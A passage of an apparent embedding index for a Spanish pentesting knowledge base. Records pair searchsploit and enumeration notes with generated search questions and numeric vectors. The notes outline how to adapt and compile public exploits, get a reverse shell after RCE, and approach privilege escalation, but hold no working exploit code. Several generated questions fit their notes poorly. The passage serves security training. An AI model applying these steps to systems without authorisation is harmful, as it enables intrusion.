-0.01953, -0.02813, -0.07652, -0.09371, -0.02526, 0.07113, -0.02956, 0.00302, -0.01463, 0.03413, 0.0441, 0.06278, -0.06304, 0.0602, -0.00215, 0.0185, 0.0318, -0.02462, -0.10308, -0.10045, -0.03719, -0.02393, 0.1407, -0.02456, 0.02539, -0.04993, -0.03007, -0.03678, 0.09711, 0.04625, -0.07264, -0.0422, -0.01701, -0.06214, 0.00477, 0.02545, -0.02845, -0.02852, -0.02019, 0.00423, 0.06278, 0.01507, -0.09117, 0.03989, -0.03005, 0.0203, -0.03722, 0.03259, 0.0195, 0.00692, 0.01787, -0.06348, 0.00332, -0.03953, -0.08671, 0.08662, -0.00588, 0.00033, -0.04001, 0.03869, -0.04179, -0.02133, 0.00186, -0.00303, 0.01848, -0.01564, -0.03191, -0.01947, -0.05148, -0.06609, -0.05209, -0.08853, -0.06462, -0.01168, -0.00153, -0.00749, 0.01308, 0.01744, 0.03802, -0.01983, 0.00523, 0.05501, -0.00293, -0.1355, -0.03965, 0.03962, -0.01626, -0.00218, -0.01498, 0.00681, 0.05796, 0.03359, 0.00737, -0.04097, 0.01683, -0.01858, 0.0176, -0.02132, 0.00379, 0.0021, 0.06, 0.00082, 0.00988, 0.05159, 0.00044, 0.04755, 0.02656, -0.01959, -0.01346, 0.03552, 0.04617, 0.01314, 0.01564, -0.01135, -0.04649, -0.05745, 0.01024, 0.00165, -0.07428, -0.05264, 0.00684, -0.01715, -0.03587, 0.06713, -0.0123]} +{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Antes de lanzar un exploit (Β‘importante!)\n1. **LΓ©elo entero.** Hay PoCs **maliciosos/falsos** que te hackean a ti.\n2. Edita lo obvio: IP/puerto del atacante, offsets, URL objetivo, shellcode.\n3. Si es C: `gcc exploit.c -o exploit` (a veces flags raras, vienen en el comentario).\n4. Si es Python2 antiguo, ojo con `print`/sockets.", "indexar": "con quΓ© herramienta puedo compilar un exploit si no tengo gcc?", "v": [-0.03788, 0.04303, -0.20071, -0.07503, 0.11322, -0.19707, -0.05083, 0.14291, -0.09672, -0.10319, -0.05075, 0.08059, -0.07587, 0.03669, 0.01887, 0.04731, -0.02693, -0.15219, -0.04092, 0.03331, 0.0156, 0.04307, -0.00344, -0.06949, -0.01303, 0.06808, 0.02405, -0.06436, -0.06979, -0.05433, 0.05217, -0.01871, 0.04536, -0.15009, -0.15715, -0.04633, -0.03843, -0.01261, -0.07347, 0.05567, -0.0307, -0.04355, -0.23023, 0.07434, 0.01038, -0.08518, 0.01999, -0.05168, -0.01446, -0.01779, -0.06955, -0.05744, -0.15899, -0.03182, 0.01369, -0.06457, 0.13945, -0.0826, 0.05978, -0.07487, -0.0222, 0.06549, -0.02298, 0.07423, -0.01472, -0.05643, -0.03906, -0.06363, -0.15041, 0.18008, -0.02666, 0.08162, -0.00929, -0.05129, 0.06921, -0.0087, 0.02508, -0.03717, 0.0586, 0.01514, -0.03309, -0.06184, -0.02416, -0.08419, -0.08533, -0.06856, 0.10674, -0.01282, 0.0364, -0.10317, -0.03962, 0.0197, -0.10314, 0.0058, 0.01493, -0.09555, 0.15306, -0.01965, -0.02785, 0.0076, 0.08625, -0.04339, -0.11895, 0.12375, -0.01525, 0.07912, 0.04274, -0.07671, -0.04316, -0.0052, 0.06344, 0.03741, -0.03199, 0.03224, -0.01491, 0.01821, -0.04078, -0.02132, -0.04742, 0.02874, -0.02992, 0.0353, -0.08405, -0.00985, 0.03331, -0.02026, -0.11933, 0.12617, -0.03889, -0.02418, -0.07195, -0.09354, -0.01971, -0.06237, -0.09775, -0.01889, 0.00732, -0.11479, 0.0477, -0.05094, 0.01807, 0.05813, -0.01714, -0.01771, 0.05415, 0.05889, -0.04377, -0.04121, -0.02445, -0.10097, 0.05616, -0.03769, 0.01018, 0.07469, -0.10247, 0.00753, 0.04983, 0.00534, 0.02639, 0.04221, -0.02313, -0.03277, -0.0029, -0.02091, -0.08191, 0.00443, 0.03444, -0.04689, 0.02011, 0.04548, -0.02158, 0.07352, 0.06463, -0.06424, 0.01035, -0.11957, -0.03185, -0.00055, -0.0124, -0.08602, -0.02242, 0.00089, -0.02744, 0.02309, 0.00888, -0.03159, 0.04866, -0.05156, 0.01165, 0.02221, 0.02292, 0.06431, 0.04824, -0.0408, 0.02531, 0.005, -0.0371, -0.0304, 0.0225, -0.00189, -0.0562, -0.03774, -0.00193, -0.02614, 0.07082, 0.06418, -0.05572, 0.03992, -0.00684, 0.00783, 0.08188, -0.00407, 0.04944, -0.08249, -0.02807, -0.01986, -0.01342, 0.03769, 0.00656, -0.06516, 0.01187, 0.02206, 0.09931, -0.00744, -0.01522, 0.00668, -0.00366, 0.00868, 0.01081, 0.06448, 0.03569, -0.04224, -0.02594, 0.00841, 0.03141, -0.02947, 0.03592, 0.0038, -0.05891, -0.00125, 0.00017, 0.0577, 0.00924, -0.01622, -0.03313, -0.05419, 0.01045, -0.05625, -0.06708, -0.07379, -0.065, 0.00726, 0.05989, -0.08576, 0.00333, 0.01411]} +{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Antes de lanzar un exploit (Β‘importante!)\n1. **LΓ©elo entero.** Hay PoCs **maliciosos/falsos** que te hackean a ti.\n2. Edita lo obvio: IP/puerto del atacante, offsets, URL objetivo, shellcode.\n3. Si es C: `gcc exploit.c -o exploit` (a veces flags raras, vienen en el comentario).\n4. Si es Python2 antiguo, ojo con `print`/sockets.", "indexar": "que programa necesito para editar los parΓ‘metros bΓ‘sicos de un exploit antes de usarlo?", "v": [0.03435, 0.12524, -0.19858, -0.18484, 0.08778, -0.0667, 0.00338, -0.07485, -0.14881, -0.08332, -0.07115, -0.04665, -0.04102, -0.01078, -0.14644, -0.05892, 0.01805, -0.06819, 0.03708, 0.01165, -0.02286, -0.02321, -0.02509, 0.02529, -0.15293, 0.13271, 0.03569, -0.08783, -0.15549, 0.04699, -0.07707, 0.07268, 0.03467, -0.16347, -0.05048, -0.00786, 0.07679, -0.0444, 0.01062, 0.14304, 0.05968, 0.00377, -0.06119, 0.05061, 0.07985, 0.03835, 0.00023, 0.01278, -0.03561, -0.04431, 0.12464, -0.05276, -0.10062, -0.0192, 0.02019, -0.10502, 0.05905, -0.1393, -0.16726, -0.0355, -0.01816, -0.10078, 0.08671, 0.0277, -0.06496, -0.08499, 0.02263, 0.00042, -0.08962, 0.10556, -0.09992, 0.12217, -0.0288, -0.01317, 0.03907, 0.0348, 0.04343, -0.05747, 0.03054, -0.00931, -0.08154, 0.01655, 0.0319, 0.03091, -0.19876, -0.01791, 0.10692, 0.02464, -0.02878, -0.03228, -0.01972, 0.00041, -0.05435, -0.02745, 0.05835, -0.01946, 0.06125, 0.10285, 0.03414, 0.12202, 0.03095, -0.18601, -0.03079, 0.12821, -0.00339, -0.00866, 0.08337, 0.00194, -0.08914, 0.03321, -0.02145, 0.00474, 0.01318, -0.10981, -0.0485, 0.01472, -0.04655, -0.09586, -0.02655, -0.0961, -0.07221, 0.03351, -0.00936, -0.0131, 0.14681, -0.05122, 0.0197, 0.05045, 0.07089, 0.09591, -0.01039, 0.00741, 0.01678, 0.04938, -0.04925, -0.02477, 0.05197, -0.03574, -0.04114, -0.05666, 0.03618, 0.07847, -0.01023, 0.01657, 0.05751, 0.01201, 0.00362, -0.04106, -0.05445, 0.03156, 0.01086, 0.00555, -0.05503, 0.06769, -0.07348, -0.10447, 0.07199, -0.02076, -0.01326, -0.04402, -0.0344, -0.07368, 0.03236, -0.05975, 0.03361, -0.08654, 0.01898, -0.00602, 0.01496, 0.08329, 0.03879, 0.07081, 0.03031, 0.0046, 0.03754, 0.0132, -0.04273, -0.05062, 0.00161, -0.0026, -0.02093, 0.01097, 0.01714, 0.06456, -0.06378, -0.01058, -0.02312, -0.01048, -0.00768, 0.0035, 0.00668, 0.046, 0.05708, 0.01122, 0.02597, 0.01447, -0.05669, -0.01447, 0.05106, -0.04807, 0.01057, -0.00399, -0.02713, -0.04729, 0.08898, 0.04283, -0.01363, -0.03732, -0.04137, 0.07745, 0.00029, -0.03768, -0.0199, -0.00158, -0.0039, 0.02668, 0.0586, 0.10646, 0.04651, -0.00019, 0.03412, 0.05206, 0.03712, 0.01801, -0.01075, -0.11138, -0.01427, -0.00233, 0.04785, -0.0103, -0.0094, -0.01492, -0.03904, 0.00396, 0.03443, -0.01755, -0.01407, 0.01464, 0.00393, -0.03989, 0.00461, 0.09779, -0.02923, -0.0234, 0.01162, 0.02106, -0.05417, 0.01497, -0.01836, -0.02421, 0.00751, 0.01009, 0.04425, -0.07019, 0.03247, 0.01118]} +{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Antes de lanzar un exploit (Β‘importante!)\n1. **LΓ©elo entero.** Hay PoCs **maliciosos/falsos** que te hackean a ti.\n2. Edita lo obvio: IP/puerto del atacante, offsets, URL objetivo, shellcode.\n3. Si es C: `gcc exploit.c -o exploit` (a veces flags raras, vienen en el comentario).\n4. Si es Python2 antiguo, ojo con `print`/sockets.", "indexar": "cual es una alternativa libre a los compiladores que usan para crear exploits maliciosos?", "v": [-0.13113, 0.03154, -0.00868, 0.01817, 0.0037, -0.10704, -0.07772, 0.01688, -0.23374, -0.07154, -0.09033, -0.20043, 0.02983, 0.08459, -0.01083, -0.20104, 0.02991, -0.06576, 0.12891, -0.01871, -0.00847, -0.00404, 0.01531, -0.11129, -0.06777, -0.0436, 0.0391, -0.06918, -0.111, 0.00919, 0.04062, 0.09675, 0.00025, -0.06955, 0.03233, -0.02939, 0.04359, 0.00664, 0.0209, 0.03298, -0.00083, -0.1334, -0.18883, 0.08017, -0.02208, -0.0223, -0.09535, 0.07084, -0.01169, 0.10355, 0.04134, 0.05328, -0.19343, 0.06497, 0.15021, -0.06088, 0.04831, -0.14564, -0.05344, 0.0064, -0.07198, 0.04749, 0.01704, -0.01288, 0.07554, -0.05768, -0.07169, -0.03888, -0.11936, 0.18952, 0.07605, 0.00159, -0.00778, -0.02254, -0.05828, 0.06288, -0.03955, -0.05345, -0.08088, 0.07007, 0.04269, -0.15918, -0.03597, -0.04322, -0.0612, -0.05892, 0.09079, -0.02418, 0.01737, -0.01323, 0.04974, -0.01923, -0.04478, 0.04646, 0.00695, -0.07292, 0.1304, 0.06478, 0.01346, 0.09072, -0.0229, -0.06918, -0.13714, 0.03044, 0.03883, 0.03358, 0.00874, 0.03831, -0.05554, -0.02151, 0.01642, 0.03604, 0.04669, 0.00885, 0.03248, -0.03641, -0.05105, 0.00573, 0.01861, -0.00837, -0.00857, -0.05865, -0.09743, -0.0395, 0.02195, 0.018, -0.02425, 0.00783, -0.01363, 0.04913, -0.0066, -0.02279, -0.06045, -0.0936, -0.14719, -0.10471, 0.08022, -0.08141, 0.03659, -0.03212, -0.00201, 0.07866, -0.02423, -0.02371, -0.00375, 0.02572, -0.02068, -0.02888, -0.03749, -0.05748, -0.04441, 0.05821, -0.07086, 0.0693, -0.10152, 0.02812, 0.02405, 0.01012, 0.03062, 0.12048, 0.04495, -0.01837, 0.01469, -0.05525, -0.06696, -0.06356, -0.00864, -0.05278, -0.04614, -0.01901, -0.02227, 0.08347, 0.06893, -0.05787, 0.08015, -0.08857, -0.04331, -0.06388, 0.00868, -0.06315, 0.03332, -0.0344, -0.0091, 0.03467, -0.03467, -0.05057, 0.06001, 0.02557, -0.01108, -0.01707, 0.00214, 0.0256, -0.02144, -0.00508, -0.0236, -0.00733, 0.00308, -0.10826, 0.0351, -0.02988, -0.03513, -0.04256, -0.00762, -0.00228, 0.01089, 0.02294, -0.06605, 0.04174, -0.02284, 0.05252, 0.08096, 0.05296, 0.01039, -0.02843, -0.04514, 0.03348, 0.011, 0.00861, -0.04599, -0.06692, 0.03349, 0.03966, 0.02361, 0.02091, -0.03412, 0.05408, -0.00431, 0.05921, -0.01491, 0.03137, -0.00633, -0.01626, -0.01447, -0.01733, -0.02521, -0.01089, 0.02331, 0.00872, 0.03372, -0.00619, 0.03969, 0.09447, -0.00512, -0.02658, -0.04888, 0.00307, -0.0223, -0.02265, -0.0696, -0.09011, 0.02891, 0.01037, -0.00891, -0.01504, 0.0706, -0.02451]} +{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## DespuΓ©s\nRCE β†’ Reverse shell. Si es local privesc β†’ mira primero PEASS-ng y Privesc Linux / Privesc Windows (kernel exploit = ΓΊltimo recurso).\n\nRelacionado: Exploits conocidos Β· Nmap NSE Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "quΓ© programa sirve para montar un reverse shell local?", "v": [0.03751, -0.00753, -0.16296, -0.10882, -0.11838, -0.10532, -0.06537, -0.05844, -0.04598, -0.10175, -0.09785, -0.01644, 0.10304, -0.13989, 0.07735, 0.07286, -0.05256, -0.15015, 0.09183, 0.04801, -0.08643, -0.02555, 0.01192, -0.12154, -0.04841, 0.11127, 0.04472, -0.02128, -0.07155, -0.04022, 0.02524, -0.0359, 0.03151, -0.04923, -0.04859, 0.01469, 0.09917, -0.091, -0.00467, 0.00962, 0.03221, -0.06008, -0.04121, 0.13313, 0.0659, 0.00662, 0.06933, -0.07947, -0.01638, 0.03714, -0.01066, -0.01186, -0.04038, 0.06108, 0.09134, -0.01476, -0.00904, -0.15599, 0.01194, -0.04498, -0.10287, 0.03539, -0.04434, 0.0044, 0.12486, -0.03708, -0.01168, -0.00479, -0.0819, -0.08294, -0.08306, -0.05069, 0.10493, -0.01353, -0.15076, 0.01111, 0.04696, 0.03124, 0.07019, -0.05647, -0.02935, -0.00475, 0.00222, 0.13307, 0.00057, 0.01229, 0.02145, -0.07713, 0.02507, 0.01396, 0.01889, 0.09749, 0.06456, 0.08869, 0.00863, -0.15205, 0.09335, 0.15694, -0.06952, 0.09178, -0.02659, -0.10321, 0.00623, 0.15677, 0.05216, 0.04697, -0.00811, 0.01468, -0.00301, 0.14013, 0.04309, 0.00293, -0.06822, 0.093, -0.08074, -0.09189, 0.00151, 0.05547, 0.06511, 0.01293, -0.043, 0.09326, 0.00023, 0.02705, -0.01821, 0.04691, 0.04236, 0.12476, -0.05856, 0.11434, 0.02233, -0.02721, 0.02773, -0.01148, -0.07807, -0.03443, 0.10236, -0.01886, -0.0272, -0.00307, 0.05484, 0.05351, -0.02813, 0.00577, -0.02201, -0.01545, 0.10126, -0.08986, -0.00192, 0.04592, 0.04293, 0.08736, -0.00138, 0.01747, -0.1091, -0.09386, 0.05943, -0.02972, -0.03138, 0.03865, -0.04963, 0.00336, 0.00473, -0.00842, 0.03972, -0.09914, -0.07335, 0.06622, 0.1192, 0.05842, -0.03673, 0.09535, 0.08161, -0.04054, 0.03842, 0.05205, 0.02457, -0.03053, 0.03366, -0.00665, -0.00924, 0.02832, 0.08523, 0.06072, -0.03212, -0.00407, 0.00033, 0.06044, 8e-05, -0.00263, -0.02339, -0.03633, -0.02094, -0.02468, 0.0105, 0.00621, 0.01916, -0.04564, 0.07644, 0.00736, -0.05124, 0.0028, 0.02705, 0.01632, 0.01644, 0.09478, -0.03932, -0.00533, 0.04522, 0.10128, -0.0305, -0.0034, 0.00755, 0.14635, 0.02397, -0.01738, -0.0058, 0.02352, -0.00397, 0.11353, -0.0029, -0.06477, -0.00391, 0.07261, -0.02339, -0.07129, 0.05632, -0.01318, 0.03648, 0.01505, -0.02126, -0.02004, -0.02041, 0.02791, -0.0509, -0.03582, 0.00298, 0.02252, 0.04393, -0.07967, -0.03107, 0.10232, -0.01446, -0.09541, -0.02821, 0.01362, -0.02264, -0.01193, 0.02094, 0.04644, -0.06278, 0.0114, -0.01397, -0.01441, 0.00577, 0.01767]} +{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## DespuΓ©s\nRCE β†’ Reverse shell. Si es local privesc β†’ mira primero PEASS-ng y Privesc Linux / Privesc Windows (kernel exploit = ΓΊltimo recurso).\n\nRelacionado: Exploits conocidos Β· Nmap NSE Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "con quΓ© puedo explorar vulnerabilidades en el kernel como ΓΊltima opciΓ³n?", "v": [0.05863, 0.02867, -0.09314, -0.05285, 0.01521, -0.05518, -0.0576, 0.04039, -0.09052, -0.2491, -0.08034, -0.08967, -0.09075, -0.04274, -0.03841, 0.05004, -0.04411, -0.08607, 0.08364, 0.0263, -0.13657, -0.08768, -0.03995, -0.02266, -0.00661, 0.03497, 0.00102, 0.01112, 0.02881, -0.15488, -0.05816, -0.00029, 0.06225, -0.04912, -0.0189, 0.09158, -0.01333, 0.11495, 0.07475, 0.00531, 0.04468, 0.03942, -0.03225, 0.12176, 0.1269, -0.04431, -0.08258, -0.06301, -0.02736, -0.07124, -0.00751, 0.00528, -0.12969, -0.04116, 0.09534, -0.01934, 0.16283, -0.1776, 0.14533, 0.00428, -0.06354, 0.01575, 0.01575, -0.02046, 0.03316, -0.13158, -0.10865, 0.03908, -0.1302, 0.1432, -0.01353, 0.06482, -0.03044, 0.03975, -0.0365, 0.08085, 0.01212, 0.02381, 0.07576, 0.04334, 0.00816, 0.03645, 0.05687, 0.03052, -0.21682, -0.11398, 0.05527, -0.01111, -0.0172, -0.10299, 0.09922, 0.04059, -0.0484, 0.04371, 0.00014, -0.0142, 0.05735, 0.05464, -0.05683, 0.02474, -0.05127, 0.02263, -0.04134, 0.18996, 0.00512, 0.03842, -0.00438, -0.02042, 0.06136, -0.08371, -0.0043, 0.0142, -0.07515, -0.04974, -0.05059, 0.02422, -0.09461, 0.02279, -0.00293, -0.07406, -0.08732, -0.0699, 0.02626, 0.02581, 0.04843, -0.00238, -0.04503, 0.08308, 0.01805, -0.05914, -0.00843, -0.06028, 0.02335, 0.00527, -0.03187, 0.0544, 0.01857, -0.02986, -0.02119, 0.01154, 0.02412, 0.03579, 0.03968, -0.00885, 0.09524, 0.02176, 0.03593, -0.02046, -0.05584, 0.05404, 0.0086, 0.02367, 0.03703, 0.03554, -0.02511, -0.00606, 0.02116, -0.05186, -0.02953, 0.10235, 0.03935, 0.03502, -0.1491, 0.08088, -0.04236, -0.02617, 0.01511, -0.03881, 0.05988, 0.02813, -0.09693, 0.09472, 0.00055, 0.02852, 0.02983, -0.08785, 0.00701, -0.01859, 0.01214, -0.04777, -0.01565, -0.03759, -0.02866, -0.04386, 0.02508, -0.00847, -0.03201, 0.02478, 0.04292, -0.01736, -0.02358, 0.03984, 0.00832, 0.08023, 0.03764, -0.05786, 0.01233, 0.02948, -0.02321, -0.03216, -0.1216, -0.0169, -0.06168, -0.01446, 0.05729, 0.0759, -0.0325, 0.0153, -0.00545, 0.04181, -0.02322, -0.02369, 0.1084, -0.04926, -0.06687, 0.03089, 0.02663, 0.01122, 0.01518, 0.02301, 0.00569, 0.04513, 0.05676, 0.01795, 0.04519, -0.01738, -0.01829, -0.03178, 0.016, 0.03318, 0.09307, 0.05566, -0.03646, -0.03089, 0.12411, 0.03139, 0.0504, 0.00286, -0.02919, -0.01312, 0.00488, 0.02832, -0.04781, -0.10447, 0.01412, -0.04722, -0.06897, 0.05395, -0.0135, -0.08405, -0.07781, 0.04896, 0.02567, -0.09748, -0.02641, -0.0314]} +{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## DespuΓ©s\nRCE β†’ Reverse shell. Si es local privesc β†’ mira primero PEASS-ng y Privesc Linux / Privesc Windows (kernel exploit = ΓΊltimo recurso).\n\nRelacionado: Exploits conocidos Β· Nmap NSE Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "dΓ³nde encuentro exploits de privilegios locales y herramientas relacionadas?", "v": [0.09331, 0.06648, -0.21032, -0.2112, 0.03191, -0.05567, 0.07536, 0.01209, -0.0577, -0.03003, -0.04451, 0.01705, -0.06602, 0.07534, 0.05856, -0.00392, 0.05595, 0.01564, -0.00689, -0.06546, -0.1064, 0.08711, -0.08453, 0.09001, 0.02607, -0.16426, 0.04035, -0.04587, -0.08391, 0.08622, 0.0657, 0.08214, -0.11462, 0.03356, 0.0107, -0.14643, 0.03671, -0.00199, -0.06405, -0.11143, 0.04388, -0.10414, -0.15212, -0.04099, 0.066, -0.12597, -0.19094, 0.08894, -0.03021, -0.02379, -0.01939, -0.10718, -0.101, -0.1373, 0.09508, -0.06728, 0.0484, 0.04692, -0.01882, 0.09562, -0.15443, -0.13724, -0.03639, -0.00181, 0.1112, -0.00054, 0.07255, -0.00182, -0.08762, 0.1219, -0.10886, 0.02849, 0.0504, 0.0023, 0.02972, 0.00797, 0.09108, 0.12112, 0.01586, 0.02995, 0.04026, 0.00661, -0.03349, 0.04301, -0.09254, -0.01503, 0.04828, -0.04473, -0.04641, -0.05071, 0.01892, 0.032, -0.00443, -0.06194, -0.05386, -0.09491, 0.06112, 0.06136, 0.01162, 0.10291, 0.04661, -0.09275, -0.06421, 0.07455, 0.008, -0.0787, -0.06224, 0.03292, 0.00408, -0.01319, 0.0227, 0.0428, 0.11114, 0.05353, 0.00864, 0.0492, 0.01323, -0.04008, 0.08105, -0.05304, -0.00449, -0.06055, -0.03433, -0.05361, 0.00419, 0.00229, -0.01744, 0.03677, 0.10615, -0.05412, -0.00329, 0.02182, 0.05307, -0.0245, 0.07714, -0.01686, 0.15577, -0.05813, -0.05408, -0.06838, 0.03807, -0.03345, 0.01377, -0.10144, 0.01649, 0.03799, -0.00727, -0.04057, -0.06725, -0.05474, -0.06207, -0.08325, -0.09174, 0.03972, -0.04618, -0.01504, 0.0108, -0.01064, -0.00488, 0.02285, -0.00072, -0.02975, 0.00173, -0.01127, -0.0063, -0.01995, 0.01727, 0.0153, 0.02432, -0.01711, -0.05015, 0.11704, 0.01305, -0.0394, -0.07748, -0.0092, 0.10248, -0.023, 0.01646, -0.0567, 0.00878, 0.05465, 0.02072, 0.02056, -0.01977, -0.01244, 0.05103, -0.07668, 0.04673, 0.04569, 0.06909, -0.03272, 0.05338, -0.03446, -0.01813, 0.00932, -0.01831, 0.03395, -0.05504, -0.00344, -0.0308, 0.01925, -0.03241, -0.0131, 0.0208, 0.06267, -0.04675, -0.0428, -0.10795, 0.03624, -0.0447, 0.01991, 0.05157, -0.06267, -0.02549, -0.08486, 0.01463, -0.07045, -0.02538, -0.02342, 0.00874, -0.02113, 0.08668, -0.0134, 0.0482, -0.06857, -0.01325, -0.00866, -0.02262, 0.03891, -0.03318, 0.03077, -0.04435, -0.01988, -0.00377, -0.02681, 0.06756, 0.01747, -0.01746, -0.02348, 0.02112, 0.03023, 0.04545, -0.01813, -0.07135, -0.02566, -0.06672, -0.08291, 0.01978, -0.00786, 0.06585, -0.03825, 0.05599, -0.0353, -0.01735, -0.02153]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# EnumeraciΓ³n (Γ­ndice)\n\n> \"EnumeraciΓ³n exhaustiva\" es el paso 1 de la MetodologΓ­a OSCP y donde mΓ‘s gente pierde horas.\n> La mayorΓ­a de los fallos del examen son enumeraciΓ³n incompleta, no falta de tΓ©cnica.", "indexar": "que herramienta sirve para hacer una enumeraciΓ³n exhaustiva de servicios en un servidor?", "v": [-0.05677, 0.02009, -0.262, -0.19875, 0.00588, -0.16818, -0.07724, -0.05624, 0.0561, -0.05978, -0.18518, -0.07829, 0.08213, -0.09403, 0.03956, 0.06605, 0.17024, -0.15511, 0.06212, 0.12179, 0.0083, 0.1058, -0.02683, 0.03767, -0.17182, 0.03471, 0.04061, -0.06348, -0.17841, 0.08961, -0.02895, -0.0321, 0.02346, -0.09106, -0.03937, -0.05256, -0.02697, 0.0834, -0.03926, 0.07325, 0.05075, 0.0098, -0.04467, 0.03533, -0.01927, 0.03357, 0.01346, -0.0079, 0.06421, 0.09001, -0.08801, -0.14399, -0.14179, -0.03874, -0.05162, -0.03455, 0.05517, -0.22342, -0.00454, -0.103, -0.12703, -0.03409, -0.05515, -0.03956, 0.06533, 0.04472, -0.05682, -0.08948, -0.00061, 0.01631, -0.07183, 0.02092, 0.06586, -0.07568, -0.01213, -0.04413, -0.0027, 0.02571, 0.02102, 0.06306, 0.03183, 0.00902, -0.09512, 0.01846, -0.10144, -0.05062, 0.06939, 0.01424, 0.07737, -0.02033, 0.01668, 0.13426, -0.08587, 0.05353, -0.01611, 0.03519, 0.13016, -0.05505, 0.02587, -0.02932, 0.1962, -0.00108, -0.05362, 0.04541, -0.01608, 0.03562, 0.06091, -0.02529, -0.04837, -0.04337, 0.08986, -0.00746, 0.00351, -0.00141, -0.06362, -0.0533, -0.04087, -0.01472, 0.02045, 0.06667, 0.01801, -0.00802, -0.01602, 0.01587, 0.003, -0.05137, -0.0046, 0.0096, 0.01645, -0.07596, 0.02539, -0.04573, -0.09962, 0.00882, -0.00636, -0.03054, 0.12522, -0.10012, 0.00082, -0.05468, 0.02909, 0.00174, -0.05534, -0.02344, 0.06885, -0.02452, 0.08621, -0.04767, -0.03015, -0.01131, 0.01826, -0.06669, -0.04785, -0.00374, -0.07974, -0.0372, 0.00367, 0.00238, -0.08456, 0.0465, -0.00196, -0.03837, 0.10521, 0.06074, 0.03049, -0.0157, 0.05718, 0.04083, 0.0544, 0.05793, -0.00234, 0.01873, 0.03002, -0.06124, -0.00434, 0.02468, -0.07378, -0.02527, 0.01811, 0.01231, -0.02148, -0.05883, -0.04112, -0.00399, -0.01397, -0.03772, 0.02299, -0.06831, -0.02705, 0.01015, -0.02586, 0.00162, -0.0368, -0.01465, 0.05122, -0.02135, -0.01917, -0.04414, -0.00365, -0.06727, -0.01904, -0.02994, -0.04478, -0.01508, -0.02074, 0.02284, -0.01592, 0.00199, 0.01108, 0.03219, -0.03152, 0.02904, 0.07023, -0.02662, -0.0129, -0.02355, 0.04666, -0.02726, -0.02491, -0.03093, -0.02088, -0.06092, -0.02196, 0.01036, 0.00018, 0.05859, 0.04145, -0.01152, 0.02469, -0.022, 0.01589, -0.04827, -0.00681, -0.00445, 0.00445, -0.08748, 0.03059, -0.05139, -0.04452, -0.05725, 0.00366, 0.04778, 0.00044, -0.01141, -0.01648, -0.0516, 0.02799, -0.04697, -0.03837, -0.05101, -0.02959, -0.04089, 0.03954, 0.01714, 0.02397, -0.01464]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# EnumeraciΓ³n (Γ­ndice)\n\n> \"EnumeraciΓ³n exhaustiva\" es el paso 1 de la MetodologΓ­a OSCP y donde mΓ‘s gente pierde horas.\n> La mayorΓ­a de los fallos del examen son enumeraciΓ³n incompleta, no falta de tΓ©cnica.", "indexar": "con quΓ© programa puedo realizar un escaneo completo de puertos y servicios para OSCP?", "v": [-0.08045, -0.08986, -0.14383, -0.06133, 0.03975, -0.21935, 0.17261, -0.10926, -0.1918, -0.09699, -0.11423, 0.06407, 0.04589, -0.11805, -0.06068, 0.00191, 0.05627, 0.00104, 0.09885, 0.16677, -0.10898, -0.05943, -0.06767, 0.01926, 0.0483, 0.11767, 0.01338, 0.00837, -0.07379, -0.00947, -0.009, 0.05866, 0.04477, -0.05041, 0.07008, -0.06632, 0.04743, -0.06449, 0.09497, 0.04425, 0.03541, 0.01823, -0.01101, -0.0018, 0.15659, -0.07434, 0.04057, -0.00508, 0.02772, -0.11834, -0.05838, -0.07769, -0.15265, -0.0015, 0.00712, -0.02954, -0.00328, -0.05509, 0.00109, -0.09507, -0.04087, 0.13943, -0.01866, -0.09175, 0.02055, -0.06963, -0.01967, 0.09431, -0.04945, 0.06667, -0.0943, 0.07161, 0.02224, 0.03649, -0.05554, -0.09289, -0.04002, -0.01292, 0.11322, -0.00265, 0.00748, 0.02492, -0.05271, 0.04588, -0.09058, -0.04647, -0.03861, -0.01422, -0.01457, -0.12555, 0.08608, 0.01573, 0.01888, 0.1118, -0.03301, -0.01051, 0.06227, 0.04918, -0.00942, 0.04035, 0.0754, 0.06452, -0.08616, 0.1304, -0.09307, 0.03649, 0.08076, -0.03794, -0.00478, 0.05442, 0.00682, 0.05141, -0.01555, -0.0426, -0.11271, -0.05635, -0.03986, -0.09682, 0.0611, 0.02455, -0.08086, 0.01901, -0.02322, 0.04859, 0.08056, 0.02191, 0.01577, 0.11982, 0.03756, 0.0674, 0.02677, -0.03332, -0.09709, -0.10395, -0.04864, -0.14409, 0.00671, -0.09198, 0.05673, -0.03612, -0.04856, 0.05571, -0.00489, 0.04262, -0.00117, -0.01038, -0.00517, -0.04084, -0.02244, -0.00918, 0.05195, 0.0612, -0.07434, 0.02355, -0.08414, -0.03217, 0.05952, -0.01024, -0.02, 0.07863, -0.00613, -0.00683, -0.03358, 0.00146, 0.04986, -0.05131, -0.02909, 0.01207, 0.00076, 0.01526, -0.04609, 0.14177, 0.00712, -0.10114, 0.00565, 0.03082, -0.0328, -0.07226, -0.00953, -0.01076, -0.11637, 0.07718, 0.04829, -0.0159, -0.04077, -0.05543, -0.04084, 